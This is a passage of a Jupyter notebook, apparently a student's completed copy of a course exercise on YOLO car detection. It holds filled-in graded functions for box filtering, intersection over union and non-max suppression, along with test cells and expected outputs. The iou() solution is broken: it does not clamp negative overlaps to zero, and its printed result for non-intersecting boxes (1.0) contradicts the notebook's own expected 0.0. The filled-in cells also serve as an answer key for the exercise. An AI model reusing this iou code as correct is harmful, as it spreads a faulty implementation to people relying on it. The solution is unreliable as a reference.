"**Important Note**: As you can see, we import Keras's backend as K. This means that to use a Keras function in this notebook, you will need to write: `K.function(...)`.",
"_____no_output_____"
],
[
"## 1 - Problem Statement\n\nYou are working on a self-driving car. As a critical component of this project, you'd like to first build a car detection system. To collect data, you've mounted a camera to the hood (meaning the front) of the car, which takes pictures of the road ahead every few seconds while you drive around. \n\n<center>\n<video width=\"400\" height=\"200\" src=\"nb_images/road_video_compressed2.mp4\" type=\"video/mp4\" controls>\n</video>\n</center>\n\n<caption><center> Pictures taken from a car-mounted camera while driving around Silicon Valley. <br> We thank [drive.ai](htps://www.drive.ai/) for providing this dataset.\n</center></caption>\n\nYou've gathered all these images into a folder and have labelled them by drawing bounding boxes around every car you found. Here's an example of what your bounding boxes look like.\n\n<img src=\"nb_images/box_label.png\" style=\"width:500px;height:250;\">\n<caption><center> <u> **Figure 1** </u>: **Definition of a box**<br> </center></caption>\n\nIf you have 80 classes that you want the object detector to recognize, you can represent the class label $c$ either as an integer from 1 to 80, or as an 80-dimensional vector (with 80 numbers) one component of which is 1 and the rest of which are 0. The video lectures had used the latter representation; in this notebook, we will use both representations, depending on which is more convenient for a particular step. \n\nIn this exercise, you will learn how \"You Only Look Once\" (YOLO) performs object detection, and then apply it to car detection. Because the YOLO model is very computationally expensive to train, we will load pre-trained weights for you to use. ",
"_____no_output_____"
],
[
"## 2 - YOLO",
"_____no_output_____"
],
[
"\"You Only Look Once\" (YOLO) is a popular algorithm because it achieves high accuracy while also being able to run in real-time. This algorithm \"only looks once\" at the image in the sense that it requires only one forward propagation pass through the network to make predictions. After non-max suppression, it then outputs recognized objects together with the bounding boxes.\n\n### 2.1 - Model details\n\n#### Inputs and outputs\n- The **input** is a batch of images, and each image has the shape (m, 608, 608, 3)\n- The **output** is a list of bounding boxes along with the recognized classes. Each bounding box is represented by 6 numbers $(p_c, b_x, b_y, b_h, b_w, c)$ as explained above. If you expand $c$ into an 80-dimensional vector, each bounding box is then represented by 85 numbers. \n\n#### Anchor Boxes\n* Anchor boxes are chosen by exploring the training data to choose reasonable height/width ratios that represent the different classes. For this assignment, 5 anchor boxes were chosen for you (to cover the 80 classes), and stored in the file './model_data/yolo_anchors.txt'\n* The dimension for anchor boxes is the second to last dimension in the encoding: $(m, n_H,n_W,anchors,classes)$.\n* The YOLO architecture is: IMAGE (m, 608, 608, 3) -> DEEP CNN -> ENCODING (m, 19, 19, 5, 85). \n\n\n#### Encoding\nLet's look in greater detail at what this encoding represents. \n\n<img src=\"nb_images/architecture.png\" style=\"width:700px;height:400;\">\n<caption><center> <u> **Figure 2** </u>: **Encoding architecture for YOLO**<br> </center></caption>\n\nIf the center/midpoint of an object falls into a grid cell, that grid cell is responsible for detecting that object.",
"_____no_output_____"
],
[
"Since we are using 5 anchor boxes, each of the 19 x19 cells thus encodes information about 5 boxes. Anchor boxes are defined only by their width and height.\n\nFor simplicity, we will flatten the last two last dimensions of the shape (19, 19, 5, 85) encoding. So the output of the Deep CNN is (19, 19, 425).\n\n<img src=\"nb_images/flatten.png\" style=\"width:700px;height:400;\">\n<caption><center> <u> **Figure 3** </u>: **Flattening the last two last dimensions**<br> </center></caption>",
"_____no_output_____"
],
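[
"As a quick illustration (a sketch only, not part of the assignment code), the flattening of the last two dimensions can be written in a couple of lines of NumPy:\n\n```python\nimport numpy as np\n\nencoding = np.random.randn(19, 19, 5, 85)     # (grid, grid, anchors, 5 box numbers + 80 classes)\nflattened = encoding.reshape(19, 19, 5 * 85)  # merge the last two dimensions\nprint(flattened.shape)                        # (19, 19, 425)\n```",
"_____no_output_____"
],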
[
"#### Class score\n\nNow, for each box (of each cell) we will compute the following element-wise product and extract a probability that the box contains a certain class. \nThe class score is $score_{c,i} = p_{c} \\times c_{i}$: the probability that there is an object $p_{c}$ times the probability that the object is a certain class $c_{i}$.\n\n<img src=\"nb_images/probability_extraction.png\" style=\"width:700px;height:400;\">\n<caption><center> <u> **Figure 4** </u>: **Find the class detected by each box**<br> </center></caption>\n\n##### Example of figure 4\n* In figure 4, let's say for box 1 (cell 1), the probability that an object exists is $p_{1}=0.60$. So there's a 60% chance that an object exists in box 1 (cell 1). \n* The probability that the object is the class \"category 3 (a car)\" is $c_{3}=0.73$. \n* The score for box 1 and for category \"3\" is $score_{1,3}=0.60 \\times 0.73 = 0.44$. \n* Let's say we calculate the score for all 80 classes in box 1, and find that the score for the car class (class 3) is the maximum. So we'll assign the score 0.44 and class \"3\" to this box \"1\".\n\n#### Visualizing classes\nHere's one way to visualize what YOLO is predicting on an image:\n- For each of the 19x19 grid cells, find the maximum of the probability scores (taking a max across the 80 classes, one maximum for each of the 5 anchor boxes).\n- Color that grid cell according to what object that grid cell considers the most likely.\n\nDoing this results in this picture: \n\n<img src=\"nb_images/proba_map.png\" style=\"width:300px;height:300;\">\n<caption><center> <u> **Figure 5** </u>: Each one of the 19x19 grid cells is colored according to which class has the largest predicted probability in that cell.<br> </center></caption>\n\nNote that this visualization isn't a core part of the YOLO algorithm itself for making predictions; it's just a nice way of visualizing an intermediate result of the algorithm. \n",
"_____no_output_____"
],
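[
"The worked example for box 1 can be reproduced with a few lines of numpy. This is only an illustrative sketch using the made-up numbers from Figure 4 ($p_{1}=0.60$ and a car-class probability of 0.73); the graded code below performs the same element-wise product on Keras tensors:\n\n```python\nimport numpy as np\n\np_c = 0.60                        # probability that some object is present in box 1\nclass_probs = np.zeros(80)\nclass_probs[2] = 0.73             # index 2 stands for the car class (class 3 in the figure)\n\nscores = p_c * class_probs        # element-wise product: score_{c,i} = p_c * c_i\nprint(np.argmax(scores))          # 2  (the car class)\nprint(round(np.max(scores), 2))   # 0.44\n```",
"_____no_output_____"
],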
[
"#### Visualizing bounding boxes\nAnother way to visualize YOLO's output is to plot the bounding boxes that it outputs. Doing that results in a visualization like this: \n\n<img src=\"nb_images/anchor_map.png\" style=\"width:200px;height:200;\">\n<caption><center> <u> **Figure 6** </u>: Each cell gives you 5 boxes. In total, the model predicts: 19x19x5 = 1805 boxes just by looking once at the image (one forward pass through the network)! Different colors denote different classes. <br> </center></caption>\n\n#### Non-Max suppression\nIn the figure above, we plotted only boxes for which the model had assigned a high probability, but this is still too many boxes. You'd like to reduce the algorithm's output to a much smaller number of detected objects. \n\nTo do so, you'll use **non-max suppression**. Specifically, you'll carry out these steps: \n- Get rid of boxes with a low score (meaning, the box is not very confident about detecting a class; either due to the low probability of any object, or low probability of this particular class).\n- Select only one box when several boxes overlap with each other and detect the same object.\n\n",
"_____no_output_____"
],
[
"### 2.2 - Filtering with a threshold on class scores\n\nYou are going to first apply a filter by thresholding. You would like to get rid of any box for which the class \"score\" is less than a chosen threshold. \n\nThe model gives you a total of 19x19x5x85 numbers, with each box described by 85 numbers. It is convenient to rearrange the (19,19,5,85) (or (19,19,425)) dimensional tensor into the following variables: \n- `box_confidence`: tensor of shape $(19 \\times 19, 5, 1)$ containing $p_c$ (confidence probability that there's some object) for each of the 5 boxes predicted in each of the 19x19 cells.\n- `boxes`: tensor of shape $(19 \\times 19, 5, 4)$ containing the midpoint and dimensions $(b_x, b_y, b_h, b_w)$ for each of the 5 boxes in each cell.\n- `box_class_probs`: tensor of shape $(19 \\times 19, 5, 80)$ containing the \"class probabilities\" $(c_1, c_2, ... c_{80})$ for each of the 80 classes for each of the 5 boxes per cell.\n\n#### **Exercise**: Implement `yolo_filter_boxes()`.\n1. Compute box scores by doing the elementwise product as described in Figure 4 ($p \\times c$). \nThe following code may help you choose the right operator: \n```python\na = np.random.randn(19*19, 5, 1)\nb = np.random.randn(19*19, 5, 80)\nc = a * b # shape of c will be (19*19, 5, 80)\n```\nThis is an example of **broadcasting** (multiplying vectors of different sizes).\n\n2. For each box, find:\n - the index of the class with the maximum box score\n - the corresponding box score\n \n **Useful references**\n * [Keras argmax](https://keras.io/backend/#argmax)\n * [Keras max](https://keras.io/backend/#max)\n\n **Additional Hints**\n * For the `axis` parameter of `argmax` and `max`, if you want to select the **last** axis, one way to do so is to set `axis=-1`. This is similar to Python array indexing, where you can select the last position of an array using `arrayname[-1]`.\n * Applying `max` normally collapses the axis for which the maximum is applied. `keepdims=False` is the default option, and allows that dimension to be removed. We don't need to keep the last dimension after applying the maximum here.\n * Even though the documentation shows `keras.backend.argmax`, use `keras.argmax`. Similarly, use `keras.max`.\n\n\n3. Create a mask by using a threshold. As a reminder: `([0.9, 0.3, 0.4, 0.5, 0.1] < 0.4)` returns: `[False, True, False, False, True]`. The mask should be True for the boxes you want to keep. \n\n4. Use TensorFlow to apply the mask to `box_class_scores`, `boxes` and `box_classes` to filter out the boxes we don't want. You should be left with just the subset of boxes you want to keep. \n\n **Useful reference**:\n * [boolean mask](https://www.tensorflow.org/api_docs/python/tf/boolean_mask) \n\n **Additional Hints**: \n * For the `tf.boolean_mask`, we can keep the default `axis=None`.\n\n**Reminder**: to call a Keras function, you should use `K.function(...)`.",
"_____no_output_____"
]
],
[
[
"# GRADED FUNCTION: yolo_filter_boxes\n\ndef yolo_filter_boxes(box_confidence, boxes, box_class_probs, threshold = .6):\n \"\"\"Filters YOLO boxes by thresholding on object and class confidence.\n \n Arguments:\n box_confidence -- tensor of shape (19, 19, 5, 1)\n boxes -- tensor of shape (19, 19, 5, 4)\n box_class_probs -- tensor of shape (19, 19, 5, 80)\n threshold -- real value, if [ highest class probability score < threshold], then get rid of the corresponding box\n \n Returns:\n scores -- tensor of shape (None,), containing the class probability score for selected boxes\n boxes -- tensor of shape (None, 4), containing (b_x, b_y, b_h, b_w) coordinates of selected boxes\n classes -- tensor of shape (None,), containing the index of the class detected by the selected boxes\n \n Note: \"None\" is here because you don't know the exact number of selected boxes, as it depends on the threshold. \n For example, the actual output size of scores would be (10,) if there are 10 boxes.\n \"\"\"\n \n # Step 1: Compute box scores\n ### START CODE HERE ### (≈ 1 line)\n box_scores = np.multiply(box_confidence, box_class_probs)\n ### END CODE HERE ###\n \n # Step 2: Find the box_classes using the max box_scores, keep track of the corresponding score\n ### START CODE HERE ### (≈ 2 lines)\n box_classes = K.argmax(box_scores, axis=-1)\n box_class_scores = K.max(box_scores, axis=-1)\n ### END CODE HERE ###\n \n # Step 3: Create a filtering mask based on \"box_class_scores\" by using \"threshold\". The mask should have the\n # same dimension as box_class_scores, and be True for the boxes you want to keep (with probability >= threshold)\n ### START CODE HERE ### (≈ 1 line)\n filtering_mask = box_class_scores >= threshold\n ### END CODE HERE ###\n \n # Step 4: Apply the mask to box_class_scores, boxes and box_classes\n ### START CODE HERE ### (≈ 3 lines)\n scores = tf.boolean_mask(box_class_scores, filtering_mask)\n boxes = tf.boolean_mask(boxes, filtering_mask)\n classes = tf.boolean_mask(box_classes, filtering_mask)\n ### END CODE HERE ###\n \n return scores, boxes, classes",
"_____no_output_____"
],
[
"with tf.Session() as test_a:\n box_confidence = tf.random_normal([19, 19, 5, 1], mean=1, stddev=4, seed = 1)\n boxes = tf.random_normal([19, 19, 5, 4], mean=1, stddev=4, seed = 1)\n box_class_probs = tf.random_normal([19, 19, 5, 80], mean=1, stddev=4, seed = 1)\n scores, boxes, classes = yolo_filter_boxes(box_confidence, boxes, box_class_probs, threshold = 0.5)\n print(\"scores[2] = \" + str(scores[2].eval()))\n print(\"boxes[2] = \" + str(boxes[2].eval()))\n print(\"classes[2] = \" + str(classes[2].eval()))\n print(\"scores.shape = \" + str(scores.shape))\n print(\"boxes.shape = \" + str(boxes.shape))\n print(\"classes.shape = \" + str(classes.shape))",
"scores[2] = 10.7506\nboxes[2] = [ 8.42653275 3.27136683 -0.5313437 -4.94137383]\nclasses[2] = 7\nscores.shape = (?,)\nboxes.shape = (?, 4)\nclasses.shape = (?,)\n"
]
],
[
[
"**Expected Output**:\n\n<table>\n <tr>\n <td>\n **scores[2]**\n </td>\n <td>\n 10.7506\n </td>\n </tr>\n <tr>\n <td>\n **boxes[2]**\n </td>\n <td>\n [ 8.42653275 3.27136683 -0.5313437 -4.94137383]\n </td>\n </tr>\n\n <tr>\n <td>\n **classes[2]**\n </td>\n <td>\n 7\n </td>\n </tr>\n <tr>\n <td>\n **scores.shape**\n </td>\n <td>\n (?,)\n </td>\n </tr>\n <tr>\n <td>\n **boxes.shape**\n </td>\n <td>\n (?, 4)\n </td>\n </tr>\n\n <tr>\n <td>\n **classes.shape**\n </td>\n <td>\n (?,)\n </td>\n </tr>\n\n</table>",
"_____no_output_____"
],
[
"**Note** In the test for `yolo_filter_boxes`, we're using random numbers to test the function. In real data, the `box_class_probs` would contain non-zero values between 0 and 1 for the probabilities. The box coordinates in `boxes` would also be chosen so that lengths and heights are non-negative.",
"_____no_output_____"
],
[
"### 2.3 - Non-max suppression ###\n\nEven after filtering by thresholding over the class scores, you still end up with a lot of overlapping boxes. A second filter for selecting the right boxes is called non-maximum suppression (NMS). ",
"_____no_output_____"
],
[
"<img src=\"nb_images/non-max-suppression.png\" style=\"width:500px;height:400;\">\n<caption><center> <u> **Figure 7** </u>: In this example, the model has predicted 3 cars, but it's actually 3 predictions of the same car. Running non-max suppression (NMS) will select only the most accurate (highest probability) of the 3 boxes. <br> </center></caption>\n",
"_____no_output_____"
],
[
"Non-max suppression uses the very important function called **\"Intersection over Union\"**, or IoU.\n<img src=\"nb_images/iou.png\" style=\"width:500px;height:400;\">\n<caption><center> <u> **Figure 8** </u>: Definition of \"Intersection over Union\". <br> </center></caption>\n\n#### **Exercise**: Implement iou(). Some hints:\n- In this code, we use the convention that (0,0) is the top-left corner of an image, (1,0) is the upper-right corner, and (1,1) is the lower-right corner. In other words, the (0,0) origin starts at the top left corner of the image. As x increases, we move to the right. As y increases, we move down.\n- For this exercise, we define a box using its two corners: upper left $(x_1, y_1)$ and lower right $(x_2,y_2)$, instead of using the midpoint, height and width. (This makes it a bit easier to calculate the intersection).\n- To calculate the area of a rectangle, multiply its height $(y_2 - y_1)$ by its width $(x_2 - x_1)$. (Since $(x_1,y_1)$ is the top left and $x_2,y_2$ are the bottom right, these differences should be non-negative.\n- To find the **intersection** of the two boxes $(xi_{1}, yi_{1}, xi_{2}, yi_{2})$: \n - Feel free to draw some examples on paper to clarify this conceptually.\n - The top left corner of the intersection $(xi_{1}, yi_{1})$ is found by comparing the top left corners $(x_1, y_1)$ of the two boxes and finding a vertex that has an x-coordinate that is closer to the right, and y-coordinate that is closer to the bottom.\n - The bottom right corner of the intersection $(xi_{2}, yi_{2})$ is found by comparing the bottom right corners $(x_2,y_2)$ of the two boxes and finding a vertex whose x-coordinate is closer to the left, and the y-coordinate that is closer to the top.\n - The two boxes **may have no intersection**. You can detect this if the intersection coordinates you calculate end up being the top right and/or bottom left corners of an intersection box. Another way to think of this is if you calculate the height $(y_2 - y_1)$ or width $(x_2 - x_1)$ and find that at least one of these lengths is negative, then there is no intersection (intersection area is zero). \n - The two boxes may intersect at the **edges or vertices**, in which case the intersection area is still zero. This happens when either the height or width (or both) of the calculated intersection is zero.\n\n\n**Additional Hints**\n\n- `xi1` = **max**imum of the x1 coordinates of the two boxes\n- `yi1` = **max**imum of the y1 coordinates of the two boxes\n- `xi2` = **min**imum of the x2 coordinates of the two boxes\n- `yi2` = **min**imum of the y2 coordinates of the two boxes\n- `inter_area` = You can use `max(height, 0)` and `max(width, 0)`\n",
"_____no_output_____"
]
],
[
[
"# GRADED FUNCTION: iou\n\ndef iou(box1, box2):\n \"\"\"Implement the intersection over union (IoU) between box1 and box2\n \n Arguments:\n box1 -- first box, list object with coordinates (box1_x1, box1_y1, box1_x2, box_1_y2)\n box2 -- second box, list object with coordinates (box2_x1, box2_y1, box2_x2, box2_y2)\n \"\"\"\n\n # Assign variable names to coordinates for clarity\n (box1_x1, box1_y1, box1_x2, box1_y2) = box1\n (box2_x1, box2_y1, box2_x2, box2_y2) = box2\n \n # Calculate the (yi1, xi1, yi2, xi2) coordinates of the intersection of box1 and box2. Calculate its Area.\n ### START CODE HERE ### (≈ 7 lines)\n xi1 = max(box1[0], box2[0])\n yi1 = max(box1[1], box2[1])\n xi2 = min(box1[2], box2[2])\n yi2 = min(box1[3], box2[3])\n inter_width = (yi2 - yi1)\n inter_height = (xi2 - xi1)\n inter_area = inter_width * inter_height\n ### END CODE HERE ### \n\n # Calculate the Union area by using Formula: Union(A,B) = A + B - Inter(A,B)\n ### START CODE HERE ### (≈ 3 lines)\n box1_area = (box1[2] - box1[0]) * (box1[3] - box1[1])\n box2_area = (box2[2] - box2[0]) * (box2[3] - box2[1])\n union_area = box1_area + box2_area - inter_area\n ### END CODE HERE ###\n \n # compute the IoU\n ### START CODE HERE ### (≈ 1 line)\n iou = inter_area / union_area\n ### END CODE HERE ###\n \n return iou",
"_____no_output_____"
],
[
"## Test case 1: boxes intersect\nbox1 = (2, 1, 4, 3)\nbox2 = (1, 2, 3, 4) \nprint(\"iou for intersecting boxes = \" + str(iou(box1, box2)))\n\n## Test case 2: boxes do not intersect\nbox1 = (1,2,3,4)\nbox2 = (5,6,7,8)\nprint(\"iou for non-intersecting boxes = \" + str(iou(box1,box2)))\n\n## Test case 3: boxes intersect at vertices only\nbox1 = (1,1,2,2)\nbox2 = (2,2,3,3)\nprint(\"iou for boxes that only touch at vertices = \" + str(iou(box1,box2)))\n\n## Test case 4: boxes intersect at edge only\nbox1 = (1,1,3,3)\nbox2 = (2,3,3,4)\nprint(\"iou for boxes that only touch at edges = \" + str(iou(box1,box2)))",
"iou for intersecting boxes = 0.14285714285714285\niou for non-intersecting boxes = 1.0\niou for boxes that only touch at vertices = 0.0\niou for boxes that only touch at edges = 0.0\n"
]
],
[
[
"**Expected Output**:\n\n```\niou for intersecting boxes = 0.14285714285714285\niou for non-intersecting boxes = 0.0\niou for boxes that only touch at vertices = 0.0\niou for boxes that only touch at edges = 0.0\n```",
"_____no_output_____"
],
[
"#### YOLO non-max suppression\n\nYou are now ready to implement non-max suppression. The key steps are: \n1. Select the box that has the highest score.\n2. Compute the overlap of this box with all other boxes, and remove boxes that overlap significantly (iou >= `iou_threshold`).\n3. Go back to step 1 and iterate until there are no more boxes with a lower score than the currently selected box.\n\nThis will remove all boxes that have a large overlap with the selected boxes. Only the \"best\" boxes remain.\n\n**Exercise**: Implement yolo_non_max_suppression() using TensorFlow. TensorFlow has two built-in functions that are used to implement non-max suppression (so you don't actually need to use your `iou()` implementation):\n\n** Reference documentation ** \n\n- [tf.image.non_max_suppression()](https://www.tensorflow.org/api_docs/python/tf/image/non_max_suppression)\n```\ntf.image.non_max_suppression(\n boxes,\n scores,\n max_output_size,\n iou_threshold=0.5,\n name=None\n)\n```\nNote that in the version of tensorflow used here, there is no parameter `score_threshold` (it's shown in the documentation for the latest version) so trying to set this value will result in an error message: *got an unexpected keyword argument 'score_threshold.*\n\n- [K.gather()](https://www.tensorflow.org/api_docs/python/tf/keras/backend/gather) \nEven though the documentation shows `tf.keras.backend.gather()`, you can use `keras.gather()`. \n```\nkeras.gather(\n reference,\n indices\n)\n```",
"_____no_output_____"
]
],
[
[
"# GRADED FUNCTION: yolo_non_max_suppression\n\ndef yolo_non_max_suppression(scores, boxes, classes, max_boxes = 10, iou_threshold = 0.5):\n \"\"\"\n Applies Non-max suppression (NMS) to set of boxes\n \n Arguments:\n scores -- tensor of shape (None,), output of yolo_filter_boxes()\n boxes -- tensor of shape (None, 4), output of yolo_filter_boxes() that have been scaled to the image size (see later)\n classes -- tensor of shape (None,), output of yolo_filter_boxes()\n max_boxes -- integer, maximum number of predicted boxes you'd like\n iou_threshold -- real value, \"intersection over union\" threshold used for NMS filtering\n \n Returns:\n scores -- tensor of shape (, None), predicted score for each box\n boxes -- tensor of shape (4, None), predicted box coordinates\n classes -- tensor of shape (, None), predicted class for each box\n \n Note: The \"None\" dimension of the output tensors has obviously to be less than max_boxes. Note also that this\n function will transpose the shapes of scores, boxes, classes. This is made for convenience.\n \"\"\"\n \n max_boxes_tensor = K.variable(max_boxes, dtype='int32') # tensor to be used in tf.image.non_max_suppression()\n K.get_session().run(tf.variables_initializer([max_boxes_tensor])) # initialize variable max_boxes_tensor\n \n # Use tf.image.non_max_suppression() to get the list of indices corresponding to boxes you keep\n ### START CODE HERE ### (≈ 1 line)\n nms_indices = tf.image.non_max_suppression(boxes, scores, max_boxes_tensor, iou_threshold)\n ### END CODE HERE ###\n \n # Use K.gather() to select only nms_indices from scores, boxes and classes\n ### START CODE HERE ### (≈ 3 lines)\n scores = K.gather(scores, nms_indices)\n boxes = K.gather(boxes, nms_indices)\n classes = K.gather(classes, nms_indices)\n ### END CODE HERE ###\n \n return scores, boxes, classes",
"_____no_output_____"
],
[
"with tf.Session() as test_b:\n scores = tf.random_normal([54,], mean=1, stddev=4, seed = 1)\n boxes = tf.random_normal([54, 4], mean=1, stddev=4, seed = 1)\n classes = tf.random_normal([54,], mean=1, stddev=4, seed = 1)\n scores, boxes, classes = yolo_non_max_suppression(scores, boxes, classes)\n print(\"scores[2] = \" + str(scores[2].eval()))\n print(\"boxes[2] = \" + str(boxes[2].eval()))\n print(\"classes[2] = \" + str(classes[2].eval()))\n print(\"scores.shape = \" + str(scores.eval().shape))\n print(\"boxes.shape = \" + str(boxes.eval().shape))\n print(\"classes.shape = \" + str(classes.eval().shape))",
"scores[2] = 6.9384\nboxes[2] = [-5.299932 3.13798141 4.45036697 0.95942086]\nclasses[2] = -2.24527\nscores.shape = (10,)\nboxes.shape = (10, 4)\nclasses.shape = (10,)\n"
]
],
[
[
"**Expected Output**:\n\n<table>\n <tr>\n <td>\n **scores[2]**\n </td>\n <td>\n 6.9384\n </td>\n </tr>\n <tr>\n <td>\n **boxes[2]**\n </td>\n <td>\n [-5.299932 3.13798141 4.45036697 0.95942086]\n </td>\n </tr>\n\n <tr>\n <td>\n **classes[2]**\n </td>\n <td>\n -2.24527\n </td>\n </tr>\n <tr>\n <td>\n **scores.shape**\n </td>\n <td>\n (10,)\n </td>\n </tr>\n <tr>\n <td>\n **boxes.shape**\n </td>\n <td>\n (10, 4)\n </td>\n </tr>\n\n <tr>\n <td>\n **classes.shape**\n </td>\n <td>\n (10,)\n </td>\n </tr>\n\n</table>",
"_____no_output_____"
],
[
"### 2.4 Wrapping up the filtering\n\nIt's time to implement a function taking the output of the deep CNN (the 19x19x5x85 dimensional encoding) and filtering through all the boxes using the functions you've just implemented. \n\n**Exercise**: Implement `yolo_eval()` which takes the output of the YOLO encoding and filters the boxes using score threshold and NMS. There's just one last implementational detail you have to know. There're a few ways of representing boxes, such as via their corners or via their midpoint and height/width. YOLO converts between a few such formats at different times, using the following functions (which we have provided): \n\n```python\nboxes = yolo_boxes_to_corners(box_xy, box_wh) \n```\nwhich converts the yolo box coordinates (x,y,w,h) to box corners' coordinates (x1, y1, x2, y2) to fit the input of `yolo_filter_boxes`\n```python\nboxes = scale_boxes(boxes, image_shape)\n```\nYOLO's network was trained to run on 608x608 images. If you are testing this data on a different size image--for example, the car detection dataset had 720x1280 images--this step rescales the boxes so that they can be plotted on top of the original 720x1280 image. \n\nDon't worry about these two functions; we'll show you where they need to be called. ",
"_____no_output_____"
]
],
[
[
"# GRADED FUNCTION: yolo_eval\n\ndef yolo_eval(yolo_outputs, image_shape = (720., 1280.), max_boxes=10, score_threshold=.6, iou_threshold=.5):\n \"\"\"\n Converts the output of YOLO encoding (a lot of boxes) to your predicted boxes along with their scores, box coordinates and classes.\n \n Arguments:\n yolo_outputs -- output of the encoding model (for image_shape of (608, 608, 3)), contains 4 tensors:\n box_confidence: tensor of shape (None, 19, 19, 5, 1)\n box_xy: tensor of shape (None, 19, 19, 5, 2)\n box_wh: tensor of shape (None, 19, 19, 5, 2)\n box_class_probs: tensor of shape (None, 19, 19, 5, 80)\n image_shape -- tensor of shape (2,) containing the input shape, in this notebook we use (608., 608.) (has to be float32 dtype)\n max_boxes -- integer, maximum number of predicted boxes you'd like\n score_threshold -- real value, if [ highest class probability score < threshold], then get rid of the corresponding box\n iou_threshold -- real value, \"intersection over union\" threshold used for NMS filtering\n \n Returns:\n scores -- tensor of shape (None, ), predicted score for each box\n boxes -- tensor of shape (None, 4), predicted box coordinates\n classes -- tensor of shape (None,), predicted class for each box\n \"\"\"\n \n ### START CODE HERE ### \n \n # Retrieve outputs of the YOLO model (≈1 line)\n box_confidence, box_xy, box_wh, box_class_probs = yolo_outputs\n\n # Convert boxes to be ready for filtering functions (convert boxes box_xy and box_wh to corner coordinates)\n boxes = yolo_boxes_to_corners(box_xy, box_wh)\n\n # Use one of the functions you've implemented to perform Score-filtering with a threshold of score_threshold (≈1 line)\n scores, boxes, classes = yolo_filter_boxes(box_confidence, boxes, box_class_probs, threshold=score_threshold)\n \n # Scale boxes back to original image shape.\n boxes = scale_boxes(boxes, image_shape)\n\n # Use one of the functions you've implemented to perform Non-max suppression with \n # maximum number of boxes set to max_boxes and a threshold of iou_threshold (≈1 line)\n scores, boxes, classes = yolo_non_max_suppression(scores, boxes, classes, max_boxes=max_boxes,\n iou_threshold=iou_threshold)\n \n ### END CODE HERE ###\n \n return scores, boxes, classes",
"_____no_output_____"
],
[
"with tf.Session() as test_b:\n yolo_outputs = (tf.random_normal([19, 19, 5, 1], mean=1, stddev=4, seed = 1),\n tf.random_normal([19, 19, 5, 2], mean=1, stddev=4, seed = 1),\n tf.random_normal([19, 19, 5, 2], mean=1, stddev=4, seed = 1),\n tf.random_normal([19, 19, 5, 80], mean=1, stddev=4, seed = 1))\n scores, boxes, classes = yolo_eval(yolo_outputs)\n print(\"scores[2] = \" + str(scores[2].eval()))\n print(\"boxes[2] = \" + str(boxes[2].eval()))\n print(\"classes[2] = \" + str(classes[2].eval()))\n print(\"scores.shape = \" + str(scores.eval().shape))\n print(\"boxes.shape = \" + str(boxes.eval().shape))\n print(\"classes.shape = \" + str(classes.eval().shape))",
"scores[2] = 138.791\nboxes[2] = [ 1292.32971191 -278.52166748 3876.98925781 -835.56494141]\nclasses[2] = 54\nscores.shape = (10,)\nboxes.shape = (10, 4)\nclasses.shape = (10,)\n"
]
],
[
[
"**Expected Output**:\n\n<table>\n <tr>\n <td>\n **scores[2]**\n </td>\n <td>\n 138.791\n </td>\n </tr>\n <tr>\n <td>\n **boxes[2]**\n </td>\n <td>\n [ 1292.32971191 -278.52166748 3876.98925781 -835.56494141]\n </td>\n </tr>\n\n <tr>\n <td>\n **classes[2]**\n </td>\n <td>\n 54\n </td>\n </tr>\n <tr>\n <td>\n **scores.shape**\n </td>\n <td>\n (10,)\n </td>\n </tr>\n <tr>\n <td>\n **boxes.shape**\n </td>\n <td>\n (10, 4)\n </td>\n </tr>\n\n <tr>\n <td>\n **classes.shape**\n </td>\n <td>\n (10,)\n </td>\n </tr>\n\n</table>",
"_____no_output_____"
],
[
"## Summary for YOLO:\n- Input image (608, 608, 3)\n- The input image goes through a CNN, resulting in a (19,19,5,85) dimensional output. \n- After flattening the last two dimensions, the output is a volume of shape (19, 19, 425):\n - Each cell in a 19x19 grid over the input image gives 425 numbers. \n - 425 = 5 x 85 because each cell contains predictions for 5 boxes, corresponding to 5 anchor boxes, as seen in lecture. \n - 85 = 5 + 80 where 5 is because $(p_c, b_x, b_y, b_h, b_w)$ has 5 numbers, and 80 is the number of classes we'd like to detect\n- You then select only few boxes based on:\n - Score-thresholding: throw away boxes that have detected a class with a score less than the threshold\n - Non-max suppression: Compute the Intersection over Union and avoid selecting overlapping boxes\n- This gives you YOLO's final output. ",
"_____no_output_____"
],
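[
"A quick arithmetic check of the numbers quoted in this summary (purely illustrative):\n\n```python\nanchors, classes = 5, 80\nper_box = 5 + classes        # (p_c, b_x, b_y, b_h, b_w) plus the class probabilities\nprint(per_box)               # 85\nprint(anchors * per_box)     # 425 numbers per grid cell\nprint(19 * 19 * anchors)     # 1805 candidate boxes per image before filtering\n```",
"_____no_output_____"
],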
[
"## 3 - Test YOLO pre-trained model on images",
"_____no_output_____"
],
[
"In this part, you are going to use a pre-trained model and test it on the car detection dataset. We'll need a session to execute the computation graph and evaluate the tensors.",
"_____no_output_____"
]
],
[
[
"sess = K.get_session()",
"_____no_output_____"
]
],
[
[
"### 3.1 - Defining classes, anchors and image shape.\n\n* Recall that we are trying to detect 80 classes, and are using 5 anchor boxes. \n* We have gathered the information on the 80 classes and 5 boxes in two files \"coco_classes.txt\" and \"yolo_anchors.txt\". \n* We'll read class names and anchors from text files.\n* The car detection dataset has 720x1280 images, which we've pre-processed into 608x608 images. ",
"_____no_output_____"
]
],
[
[
"class_names = read_classes(\"model_data/coco_classes.txt\")\nanchors = read_anchors(\"model_data/yolo_anchors.txt\")\nimage_shape = (720., 1280.) ",
"_____no_output_____"
]
],
[
[
"### 3.2 - Loading a pre-trained model\n\n* Training a YOLO model takes a very long time and requires a fairly large dataset of labelled bounding boxes for a large range of target classes. \n* You are going to load an existing pre-trained Keras YOLO model stored in \"yolo.h5\". \n* These weights come from the official YOLO website, and were converted using a function written by Allan Zelener. References are at the end of this notebook. Technically, these are the parameters from the \"YOLOv2\" model, but we will simply refer to it as \"YOLO\" in this notebook.\n\nRun the cell below to load the model from this file.",
"_____no_output_____"
]
],
[
[
"yolo_model = load_model(\"model_data/yolo.h5\")",
"/opt/conda/lib/python3.6/site-packages/keras/models.py:251: UserWarning: No training configuration found in save file: the model was *not* compiled. Compile it manually.\n warnings.warn('No training configuration found in save file: '\n"
]
],
[
[
"This loads the weights of a trained YOLO model. Here's a summary of the layers your model contains.",
"_____no_output_____"
]
],
[
[
"yolo_model.summary()",
